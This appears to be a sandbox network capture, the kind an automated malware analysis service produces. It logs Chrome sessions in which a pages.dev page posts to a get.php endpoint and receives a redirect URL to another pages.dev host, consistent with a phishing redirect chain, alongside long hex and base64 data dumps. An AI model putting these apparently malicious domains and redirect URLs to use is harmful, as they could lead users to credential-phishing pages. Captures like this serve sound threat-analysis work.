2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 63 4b 49 58 4c 68 46 35 2f 63 30 69 72 33 36 54 79 41 4c 34 46 54 48 69 42 6c 67 63 51 56 78 79 73 45 4f 55 77 7a 2b 37 67 34 33 63 77 4f 69 36 67 4c 77 77 4f 43 5a 33 50 4e 79 72 42 65 6c 77 41 2b 79 43 64 31 2b 35 77 50 39 2b 65 6c 69 4f 4c 74 53 74 69 30 45 6f 74 79 4b 4e 44 50 6e 2b 35 71 35 46 63 75 33 47 39 4c 50 48 4d 79 65 47 35 4c 74 50 6d 53 2b 75 57 48 6b 61 65 45 52 42 65 61 5a 51 44 52 4d 4d 38 32 41 37 36 41 42 4c 54 55 47 4c 51 35 69 77 71 7a 66 62 51 47 4a 77 32 64 52 31 58 4f 53 42 68 30 51 65 66 31 79 6b 76 7a 38 67 52 6e 69 4f 63 4a 4a 49 41 4d 34 53 61 38 38 52 32 58 77 68 37 49 79 31 77 56 4b 4b 73 30 6b 4a 2b 41 6c 69 54 6a 79 50 6f 54 4e 43 44 54 74 6f 2f 49 35 4b 42 46 6a 6e 66 32 33 50 61 54 6e 53 6c 2f 36 75 4f 76 46 6e 4e 33 54 Data Ascii: cKIXLhF5/c0ir36TyAL4FTHiBlgcQVxysEOUwz+7g43cwOi6gLwwOCZ3PNyrBelwA+yCd1+5wP9+eliOLtSti0EotyKNDPn+5q5Fcu3G9LPHMyeG5LtPmS+uWHkaeERBeaZQDRMM82A76ABLTUGLQ5iwqzfbQGJw2dR1XOSBh0Qef1ykvz8gRniOcJJIAM4Sa88R2Xwh7Iy1wVKKs0kJ+AliTjyPoTNCDTto/I5KBFjnf23PaTnSl/6uOvFnN3T
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 33 36 52 33 69 37 6b 68 51 45 66 57 55 72 52 51 55 59 44 66 4f 57 36 77 44 57 62 70 64 53 45 77 45 4f 51 44 33 70 6d 6b 48 4b 67 7a 67 76 2f 4d 57 76 72 4a 4c 6e 6e 61 37 67 67 6c 32 78 6f 6c 52 2f 38 32 68 72 70 79 50 43 53 30 6c 54 6a 30 7a 38 2b 4b 62 2f 7a 39 34 63 43 31 70 6d 7a 46 62 62 52 67 67 6d 47 63 56 62 37 48 64 56 6b 51 4a 6d 6b 65 50 34 6e 49 4d 6a 75 77 4d 2f 42 31 67 42 69 72 41 4e 42 2b 48 50 51 5a 76 43 52 49 49 32 63 68 54 4d 56 4d 48 6e 67 77 46 36 34 44 48 58 4f 50 6b 73 72 4d 4e 30 77 44 50 43 65 67 79 4b 6e 44 75 4d 4b 43 48 75 50 65 64 6f 77 64 6b 63 6e 44 4f 2b 31 47 34 4e 6c 46 63 6b 79 73 52 65 4a 6b 43 41 54 4f 7a 49 6a 64 64 51 42 48 6e 78 31 62 36 79 54 42 35 38 37 4b 32 2f 35 79 6b 48 70 35 35 64 4d 71 68 42 66 76 4c 39 48 Data Ascii: 36R3i7khQEfWUrRQUYDfOW6wDWbpdSEwEOQD3pmkHKgzgv/MWvrJLnna7ggl2xolR/82hrpyPCS0lTj0z8+Kb/z94cC1pmzFbbRggmGcVb7HdVkQJmkeP4nIMjuwM/B1gBirANB+HPQZvCRII2chTMVMHngwF64DHXOPksrMN0wDPCegyKnDuMKCHuPedowdkcnDO+1G4NlFckysReJkCATOzIjddQBHnx1b6yTB587K2/5ykHp55dMqhBfvL9H
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 4c 63 4d 43 65 38 2b 50 4f 43 78 4e 2f 35 4f 44 4d 30 70 6e 35 4f 34 66 6d 54 51 2f 4c 49 6f 51 47 35 37 38 56 2b 65 58 42 2f 76 33 53 52 46 4c 7a 4c 79 41 54 6a 5a 79 43 41 71 59 4d 35 4b 6b 39 43 2f 57 4b 52 55 74 6c 48 4f 48 4d 66 35 4c 42 4e 45 42 42 6a 33 63 34 5a 51 4a 44 6c 41 5a 6c 35 6f 2b 2b 6b 64 61 50 50 7a 42 6a 71 56 4b 4b 2b 4a 41 45 4e 63 4e 37 6b 34 7a 76 67 61 69 6c 46 59 6c 52 46 57 30 6f 51 4a 4b 79 6a 56 64 6c 53 39 56 62 78 4b 66 52 64 50 53 4b 74 4c 72 30 63 32 48 53 38 51 73 46 57 34 4a 63 51 32 2b 44 34 79 56 42 6a 4f 70 41 67 2f 4b 55 71 45 71 52 33 59 41 77 7a 4f 6b 36 38 32 70 46 43 70 4c 72 68 5a 35 72 4e 44 43 30 77 71 45 52 47 54 6a 33 34 48 62 58 53 53 4a 48 41 6e 6a 46 63 4b 49 4c 38 64 4a 77 67 31 4f 45 64 39 47 71 2f 55 Data Ascii: LcMCe8+POCxN/5ODM0pn5O4fmTQ/LIoQG578V+eXB/v3SRFLzLyATjZyCAqYM5Kk9C/WKRUtlHOHMf5LBNEBBj3c4ZQJDlAZl5o++kdaPPzBjqVKK+JAENcN7k4zvgailFYlRFW0oQJKyjVdlS9VbxKfRdPSKtLr0c2HS8QsFW4JcQ2+D4yVBjOpAg/KUqEqR3YAwzOk682pFCpLrhZ5rNDC0wqERGTj34HbXSSJHAnjFcKIL8dJwg1OEd9Gq/U
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 6d 55 46 63 45 35 6f 46 68 4d 63 4b 38 39 79 4e 76 6b 48 43 41 54 39 70 61 65 62 4d 65 4a 41 62 66 36 44 76 6e 41 70 47 58 58 59 65 36 62 67 72 69 5a 36 43 64 6b 51 53 4c 49 47 69 30 50 76 38 42 33 4c 41 46 4a 62 63 69 36 55 32 72 53 79 54 70 6d 6b 46 67 6f 47 53 42 4e 34 49 34 33 5a 41 59 56 70 77 54 4c 49 30 55 43 56 68 47 57 4c 34 35 63 67 44 70 51 56 53 55 6e 6d 46 58 70 6d 47 69 56 4c 54 57 34 56 57 59 34 45 79 79 66 72 33 49 69 75 55 69 4c 53 33 57 65 74 34 4d 57 4c 6a 42 33 6d 41 67 71 32 31 57 44 4f 78 79 6c 31 31 4d 78 2f 73 58 70 77 38 48 64 73 5a 5a 2f 52 36 34 6e 5a 2b 78 4f 39 61 41 45 46 65 41 47 46 74 41 6b 43 59 51 68 66 57 71 51 59 79 33 50 4f 77 63 4f 48 30 6f 67 70 49 37 6b 54 34 39 49 6b 37 58 70 2b 2f 54 4a 64 4c 71 6d 71 41 6c 43 75 Data Ascii: mUFcE5oFhMcK89yNvkHCAT9paebMeJAbf6DvnApGXXYe6bgriZ6CdkQSLIGi0Pv8B3LAFJbci6U2rSyTpmkFgoGSBN4I43ZAYVpwTLI0UCVhGWL45cgDpQVSUnmFXpmGiVLTW4VWY4Eyyfr3IiuUiLS3Wet4MWLjB3mAgq21WDOxyl11Mx/sXpw8HdsZZ/R64nZ+xO9aAEFeAGFtAkCYQhfWqQYy3POwcOH0ogpI7kT49Ik7Xp+/TJdLqmqAlCu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49721	162.254.39.141	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:34 UTC	774	OUT	POST /get.php HTTP/1.1 Host: fetchlnk.truesharingzone.site Connection: keep-alive Content-Length: 20 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: text/html, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:34 UTC	20	OUT	Data Raw: 6f 69 64 3d 41 52 4e 49 53 41 4a 4f 26 64 69 73 70 65 6d 3d Data Ascii: oid=ARNISAJO&dispem=
2024-08-31 22:54:34 UTC	276	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.0.30 access-control-allow-origin: * content-type: text/html; charset=UTF-8 content-length: 210 date: Sat, 31 Aug 2024 22:54:34 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-31 22:54:34 UTC	210	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 70 61 6c 69 73 61 64 65 73 2d 6f 62 73 65 72 76 61 74 6f 72 79 2d 33 61 65 61 36 36 31 33 38 65 30 30 65 35 37 65 39 66 2d 35 36 37 37 65 64 34 35 34 39 66 31 39 63 32 35 2e 70 61 67 65 73 2e 64 65 76 2f 38 39 30 66 35 65 34 32 31 39 31 32 64 38 33 30 38 36 65 35 64 63 63 32 2f 38 36 62 31 64 39 39 34 33 62 38 63 31 38 34 32 30 31 35 33 65 37 3f 63 36 39 72 31 35 33 3d 69 74 71 66 38 30 6e 26 38 6c 73 31 74 33 78 7a 3d 65 39 36 36 31 39 63 30 66 34 31 65 34 35 37 64 63 36 37 35 32 36 66 66 36 38 61 32 26 35 74 77 38 62 73 78 37 65 3d 38 37 64 63 32 32 38 37 38 65 30 31 39 33 39 37 63 36 34 39 62 38 Data Ascii: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49724	172.66.47.137	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:35 UTC	403	OUT	GET /favicon.ico HTTP/1.1 Host: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:35 UTC	790	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tp7BuqRJa6FnWKeePdh1gjwO3A8lGc78rq2iY4Hv81SqrtEpcJVwKqSybL8iWUons4WWSoQmPdYz6S9iRsmMV61YHIEm4y0twbBpvunAlyCUgi4Jh%2FlU1ZChll9mYHOzXwN%2Fm8nZAYwz6WoPm9BwPO3BJhTuWDje8XsINHZu%2B%2FqjDGzSudH9V4jnJDZc5ZGvBbk652Mscw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc09a6dffb343b1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 22:54:35 UTC	579	IN	Data Raw: 34 61 65 66 0d 0a 3c 64 69 76 20 69 64 3d 22 68 62 67 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 30 20 61 75 74 6f 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 22 3e 0d 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4d 67 41 41 41 43 35 43 41 59 41 41 41 42 74 4a 6e 44 36 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 49 41 41 41 37 43 41 52 55 6f 53 6f 41 41 41 44 4c 46 53 Data Ascii: 4aef<div id="hbg" style="width: 100px;margin: 0 auto; 0 auto;visibility:hidden;"><img style="width: 100%;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAAC5CAYAAABtJnD6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAADLFS
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 69 72 48 37 4d 4d 42 7a 43 53 37 73 4f 52 36 51 59 64 54 59 59 34 2b 31 6a 5a 75 2f 57 45 4c 79 50 45 46 2b 48 4a 79 7a 46 36 73 78 68 6a 34 63 2b 31 50 6a 64 6c 42 6b 4e 48 52 74 2b 50 2f 52 55 45 67 78 36 78 46 6f 58 41 44 56 68 4b 76 30 71 46 55 6d 42 30 45 4b 52 52 49 6b 42 77 35 69 4c 66 70 59 79 72 55 50 6b 48 65 66 66 64 43 2f 44 38 2f 43 4f 53 59 39 53 67 55 4c 70 58 66 76 7a 2f 31 75 4a 38 4e 4d 30 67 48 33 50 7a 41 6d 79 4f 48 4c 4a 62 54 76 57 33 61 58 78 4b 31 54 35 43 36 75 74 6c 37 4d 7a 53 48 44 33 57 59 52 56 4b 50 69 64 6c 68 67 2b 54 49 55 53 5a 79 67 75 54 49 6b 59 43 63 49 44 6c 79 4a 43 41 6e 53 49 34 63 43 63 67 4a 6b 69 4e 48 41 6e 4b 43 35 4d 69 52 67 4a 77 67 4f 58 49 6b 49 43 64 49 6a 68 77 4a 79 41 6d 53 49 30 63 43 63 6f 4c 6b Data Ascii: irH7MMBzCS7sOR6QYdTYY4+1jZu/WELyPEF+HJyzF6sxhj4c+1PjdlBkNHRt+P/RUEgx6xFoXADVhKv0qFUmB0EKRRIkBw5iLfpYyrUPkHeffdC/D8/COSY9SgULpXfvz/1uJ8NM0gH3PzAmyOHLJbTvW3aXxK1T5C6utl7MzSHD3WYRVKPidlhg+TIUSZyguTIkYCcIDlyJCAnSI4cCcgJkiNHAnKC5MiRgJwgOXIkICdIjhwJyAmSI0cCcoLk
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 63 79 44 41 5a 4c 4d 57 74 2f 55 62 2b 63 50 6c 62 70 4d 69 51 75 74 78 77 69 64 56 71 6a 68 47 4d 35 41 31 65 56 77 33 38 67 77 63 72 7a 67 32 55 58 2b 63 43 5a 67 7a 50 49 73 63 4d 49 65 32 61 52 61 6b 51 5a 7a 61 39 57 57 47 65 38 37 6e 72 38 6d 78 64 30 6c 42 4b 55 67 4b 57 59 4f 6f 32 46 72 50 71 45 4b 73 63 71 4c 45 30 65 35 5a 52 6a 6b 43 71 74 70 63 53 36 6c 56 4d 65 30 35 41 4d 64 41 55 73 6d 39 71 58 77 72 61 41 41 57 34 49 51 33 53 42 49 42 55 31 5a 67 71 68 71 31 77 4c 73 43 39 4a 6c 36 63 66 45 46 72 52 38 71 5a 47 52 57 6d 73 68 50 51 6d 64 55 53 59 70 67 79 6b 54 71 75 56 79 69 55 47 77 58 53 52 64 6b 42 51 44 2f 75 6a 64 54 47 38 49 45 73 64 77 6e 4f 67 63 4b 5a 58 5a 47 51 59 59 66 68 72 61 41 42 57 4f 38 59 4a 55 70 42 4f 37 59 73 42 65 Data Ascii: cyDAZLMWt/Ub+cPlbpMiQutxwidVqjhGM5A1eVw38gwcrzg2UX+cCZgzPIscMIe2aRakQZza9WWGe87nr8mxd0lBKUgKWYOo2FrPqEKscqLE0e5ZRjkCqtpcS6lVMe05AMdAUsm9qXwraAAW4IQ3SBIBU1Zgqhq1wLsC9Jl6cfEFrR8qZGRWmshPQmdUSYpgykTquVyiUGwXSRdkBQD/ujdTG8IEsdwnOgcKZXZGQYYfhraABWO8YJUpBO7YsBe
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 4c 31 54 6e 47 6d 33 52 2b 73 76 53 6c 47 75 6b 46 61 63 61 73 73 47 74 64 71 37 78 70 61 37 74 63 74 36 46 56 4e 69 35 73 4c 4c 73 50 54 67 2b 4f 79 55 4e 48 42 75 57 66 6e 6a 67 6a 33 33 79 79 54 31 34 43 63 52 51 34 32 78 69 34 64 57 53 55 72 39 36 32 66 43 4b 49 59 57 41 49 63 68 77 45 55 5a 38 42 51 6d 61 4e 49 4d 6a 6c 4f 55 45 6d 41 46 50 77 5a 55 57 65 44 4e 55 70 75 6d 4f 4d 6c 2b 63 6c 37 74 78 59 36 69 56 42 50 53 79 48 4f 75 63 31 79 4f 39 66 73 31 67 65 65 74 63 61 2b 58 38 33 72 35 52 62 4c 35 6b 76 35 32 44 47 71 4f 54 38 7a 38 64 4d 63 77 33 49 39 75 6e 58 4c 70 48 48 33 72 4e 57 76 76 79 32 46 58 49 5a 77 6d 70 47 34 53 78 6c 77 79 33 48 74 4d 2f 49 56 5a 76 77 7a 78 32 67 54 72 41 73 4b 50 74 44 65 63 5a 76 46 45 35 45 76 6a 6b 79 49 54 Data Ascii: L1TnGm3R+svSlGukFacassGtdq7xpa7tct6FVNi5sLLsPTg+OyUNHBuWfnjgj33yyT14CcRQ42xi4dWSUr962fCKIYWAIchwEUZ8BQmaNIMjlOUEmAFPwZUWeDNUpumOMl+cl7txY6iVBPSyHOuc1yO9fs1geetca+X83r5RbL5kv52DGqOT8z8dMcw3I9unXLpHH3rNWvvy2FXIZwmpG4Sxlwy3HtM/IVZvwzx2gTrAsKPtDecZvFE5EvjkyIT
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 57 6a 78 38 5a 46 42 75 76 50 4f 51 58 50 32 46 2f 66 4b 58 50 2b 6d 57 66 56 32 44 4d 71 49 65 47 77 6b 49 6f 52 7a 58 77 70 6f 49 78 33 74 48 35 46 75 50 39 73 70 4e 64 78 36 57 53 7a 37 2f 6b 76 7a 44 45 33 31 4b 6e 68 55 66 66 39 56 69 4f 58 63 56 42 69 66 4c 53 6e 4d 65 56 4a 76 56 50 2b 30 30 6e 47 41 45 4b 73 34 54 6d 61 67 66 65 48 4e 4d 44 71 49 32 69 49 38 63 6c 58 61 43 6d 78 62 68 6a 32 47 77 4c 65 57 36 50 69 4d 2b 64 56 2b 50 58 41 46 69 66 4f 63 78 50 63 68 35 4e 53 63 78 57 47 2b 57 34 36 73 2f 31 38 53 61 4d 49 38 66 47 70 54 2f 38 72 65 48 35 4a 5a 2f 36 5a 49 68 62 69 31 6e 51 44 75 75 6a 6e 2f 30 61 6b 33 71 55 6b 6e 6a 42 6e 6c 63 75 6a 44 4f 55 72 42 31 54 66 74 79 54 44 6d 69 42 48 46 52 53 61 63 77 72 5a 73 65 68 75 37 6c 36 31 76 Data Ascii: Wjx8ZFBuvPOQXP2F/fKXP+mWfV2DMqIeGwkIoRzXwpoIx3tH5FuP9spNdx6WSz7/kvzDE31KnhUff9ViOXcVBifLSnMeVJvVP+00nGAEKs4TmagfeHNMDqI2iI8clXaCmxbhj2GwLeW6PiM+dV+PXAFifOcxPch5NScxWG+W46s/18SaMI8fGpT/8reH5JZ/6ZIhbi1nQDuujn/0ak3qUknjBnlcujDOUrB1TftyTDmiBHFRSacwrZsehu7l61v
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 4e 67 34 50 6f 4f 77 49 6e 48 6e 67 54 49 6c 74 79 4a 44 6d 51 4d 6c 39 30 58 6b 6d 41 36 4d 45 38 52 30 57 4b 71 2b 30 55 70 78 41 38 4c 42 6c 67 79 37 56 2f 30 6a 42 58 6d 4b 39 79 56 73 36 71 70 36 73 53 79 6e 4d 42 4e 4d 55 59 64 59 6d 4c 7a 42 78 38 65 37 42 67 4e 5a 53 71 78 5a 67 42 6e 45 70 50 66 56 77 63 51 70 36 47 4e 4a 58 56 38 6b 45 43 50 4f 55 51 62 34 32 2f 4d 70 6b 56 37 54 52 6b 49 2f 46 67 45 44 62 7a 57 58 49 69 6e 42 39 7a 65 4f 6e 68 6b 64 6e 30 48 55 67 50 49 55 35 69 73 2f 77 57 51 70 51 74 67 47 6e 52 48 53 48 6a 67 31 49 6b 4e 78 4f 31 4d 65 63 4a 6e 6c 72 59 69 62 4e 34 2b 68 7a 45 45 6f 74 79 4c 64 4d 4a 47 6c 62 54 6d 53 38 65 59 46 71 61 2b 45 47 51 69 69 65 39 49 33 57 4a 4d 41 51 37 73 7a 77 35 4f 37 78 30 43 4f 76 6b 47 39 Data Ascii: Ng4PoOwInHngTIltyJDmQMl90XkmA6ME8R0WKq+0UpxA8LBlgy7V/0jBXmK9yVs6qp6sSynMBNMUYdYmLzBx8e7BgNZSqxZgBnEpPfVwcQp6GNJXV8kECPOUQb42/MpkV7TRkI/FgEDbzWXIinB9zeOnhkdn0HUgPIU5is/wWQpQtgGnRHSHjg1IkNxO1MecJnlrYibN4+hzEEotyLdMJGlbTmS8eYFqa+EGQiie9I3WJMAQ7szw5O7x0COvkG9
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 33 5a 4d 6c 66 6b 69 6c 66 42 49 41 31 65 44 34 38 6e 69 4f 6c 41 58 79 66 36 45 4f 6f 37 43 64 44 4a 54 78 77 62 6b 70 36 42 39 49 62 36 56 52 69 6f 43 2b 66 78 55 58 4b 64 56 35 69 76 63 52 71 57 74 77 69 52 4e 50 6f 51 70 34 39 79 31 69 31 71 6b 68 30 72 2b 46 6e 50 64 4c 68 33 66 37 2b 49 65 53 77 6c 4c 74 2f 4d 78 50 44 6f 6c 6b 4a 4f 6f 6d 53 59 47 65 50 67 45 5a 48 37 66 79 36 79 37 39 6b 67 62 47 4d 4d 68 42 6b 42 65 56 61 75 46 2f 6e 46 64 34 69 73 57 69 64 79 39 4b 43 4b 38 68 50 45 64 45 7a 61 6b 30 39 39 74 34 4f 56 44 41 34 7a 77 53 45 59 73 2f 7a 41 64 46 71 73 61 4b 2b 58 61 7a 62 69 61 68 37 65 5a 37 44 79 4a 55 7a 65 50 6f 52 78 6c 6b 4b 69 4c 76 36 4e 46 4f 51 31 35 37 52 6c 4d 74 44 76 66 75 61 4d 39 6e 6c 67 38 72 57 68 5a 49 45 33 41 Data Ascii: 3ZMlfkilfBIA1eD48niOlAXyf6EOo7CdDJTxwbkp6B9Ib6VRioC+fxUXKdV5ivcRqWtwiRNPoQp49y1i1qkh0r+FnPdLh3f7+IeSwlLt/MxPDolkJOomSYGePgEZH7fy6y79kgbGMMhBkBeVauF/nFd4isWidy9KCK8hPEdEzak099t4OVDA4zwSEYs/zAdFqsaK+Xazbiah7eZ7DyJUzePoRxlkKiLv6NFOQ157RlMtDvfuaM9nlg8rWhZIE3A
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 36 51 76 44 35 72 4f 2f 2b 36 68 70 35 50 58 65 61 65 4f 38 68 31 52 63 4e 4e 65 77 77 30 32 46 5a 39 66 71 4c 4f 2b 52 37 76 37 35 57 4f 74 76 63 62 61 68 6b 2f 4d 6e 64 4a 2b 51 59 66 78 61 61 5a 38 31 58 46 71 48 6b 54 69 53 39 49 54 45 73 4f 47 71 78 59 4c 2f 34 79 4a 41 6d 62 61 32 41 4d 77 5a 76 38 44 33 33 67 73 69 39 73 44 4e 65 66 43 6b 59 38 44 59 78 7a 50 6c 64 41 4e 74 31 30 33 61 52 6c 52 73 77 67 7a 52 72 59 70 52 33 73 71 49 45 55 52 32 47 66 33 5a 48 4b 6c 6e 67 72 51 6a 4d 41 35 31 38 6f 6d 64 59 2f 73 66 33 73 57 62 4d 43 48 35 58 36 35 39 76 58 69 57 66 65 63 74 79 57 64 62 52 47 43 79 35 7a 48 30 53 35 55 49 50 6e 4f 57 6c 34 30 34 59 39 46 63 76 62 70 4b 2f 65 4f 73 71 2b 65 64 66 58 70 33 70 4f 31 33 45 41 77 66 36 35 62 4d 2f 30 54 Data Ascii: 6QvD5rO/+6hp5PXeaeO8h1RcNNeww02FZ9fqLO+R7v75WOtvcbahk/MndJ+QYfxaaZ81XFqHkTiS9ITEsOGqxYL/4yJAmba2AMwZv8D33gsi9sDNefCkY8DYxzPldANt103aRlRswgzRrYpR3sqIEUR2Gf3ZHKlngrQjMA518omdY/sf3sWbMCH5X659vXiWfectyWdbRGCy5zH0S5UIPnOWl404Y9FcvbpK/eOsq+edfXp3pO13EAwf65bM/0T
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 70 45 38 4c 50 57 6a 4b 75 55 70 58 45 34 79 64 4d 64 43 4c 5a 65 54 6a 63 48 74 46 2b 6b 38 48 4d 68 55 48 48 5a 35 4c 33 74 44 6a 4e 75 32 6d 62 53 49 37 72 67 68 65 5a 4f 4c 35 6d 6a 68 62 6f 79 54 4b 4a 30 68 6b 30 47 67 2f 44 37 62 59 52 68 68 6e 46 48 41 30 65 59 41 6b 65 77 38 4d 79 48 2f 36 33 49 76 79 65 53 78 72 70 67 74 37 6a 77 37 4b 4b 2f 2f 79 42 66 6e 6b 39 32 41 59 38 73 79 6f 63 57 6a 71 43 39 43 72 6e 43 56 54 51 4c 68 49 6c 67 53 54 55 56 61 55 6b 36 61 61 67 42 4e 71 37 49 79 75 5a 37 43 63 77 71 7a 52 78 79 31 2f 54 52 69 43 54 53 51 78 71 4c 63 61 4e 73 62 4f 71 77 4a 62 67 34 5a 2f 69 6b 64 44 4a 68 6f 57 51 56 4b 65 66 4e 57 33 52 6c 63 66 6c 53 7a 77 65 75 48 47 4d 62 30 72 61 36 69 54 76 6a 4f 6a 38 75 36 76 48 35 4a 66 2b 4e 4a Data Ascii: pE8LPWjKuUpXE4ydMdCLZeTjcHtF+k8HMhUHHZ5L3tDjNu2mbSI7rgheZOL5mjhboyTKJ0hk0Gg/D7bYRhhnFHA0eYAkew8MyH/63IvyeSxrpgt7jw7KK//yBfnk92AY8syocWjqC9CrnCVTQLhIlgSTUVaUk6aagBNq7IyuZ7CcwqzRxy1/TRiCTSQxqLcaNsbOqwJbg4Z/ikdDJhoWQVKefNW3RlcflSzweuHGMb0ra6iTvjOj8u6vH5Jf+NJ
2024-08-31 22:54:35 UTC	1369	IN	Data Raw: 65 4d 4f 78 6e 63 50 6c 6c 51 6a 76 4e 46 6e 6e 58 6a 4f 33 4e 79 46 55 6a 66 36 64 6a 67 33 2b 71 71 6b 48 51 6b 59 4a 34 67 4e 31 6a 75 70 37 69 72 4f 55 6d 4a 44 66 66 70 4b 78 65 68 70 42 63 73 62 51 53 69 33 49 68 4e 31 50 5a 45 2b 66 5a 2b 75 43 61 70 36 68 34 48 41 47 57 38 71 70 46 42 57 4b 76 6a 6e 71 32 39 63 57 71 4d 2f 68 4b 76 77 47 54 6a 7a 79 72 48 68 78 37 53 44 78 4d 44 51 47 65 36 48 6e 66 45 43 33 50 4f 6f 36 39 6c 41 5a 6d 59 4d 74 6f 33 45 6f 47 30 78 6a 54 66 36 4b 6b 55 78 51 57 4c 36 54 49 46 78 4b 6c 34 72 68 57 45 48 72 68 36 52 53 6c 63 72 57 4e 34 49 6c 4e 77 54 6d 61 51 66 70 36 76 45 37 45 7a 64 6f 61 45 73 44 56 49 71 46 39 57 31 31 41 6a 33 36 44 4f 50 66 68 4a 6c 45 49 59 76 42 71 53 35 61 6b 38 4c 57 44 61 47 7a 4e 69 77 Data Ascii: eMOxncPllQjvNFnnXjO3NyFUjf6djg3+qqkHQkYJ4gN1jup7irOUmJDffpKxehpBcsbQSi3IhN1PZE+fZ+uCap6h4HAGW8qpFBWKvjnq29cWqM/hKvwGTjzyrHhx7SDxMDQGe6HnfEC3POo69lAZmYMto3EoG0xjTf6KkUxQWL6TIFxKl4rhWEHrh6RSlcrWN4IlNwTmaQfp6vE7EzdoaEsDVIqF9W11Aj36DOPfhJlEIYvBqS5ak8LWDaGzNiw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49725	172.66.47.41	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:35 UTC	918	OUT	GET /890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8 HTTP/1.1 Host: palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
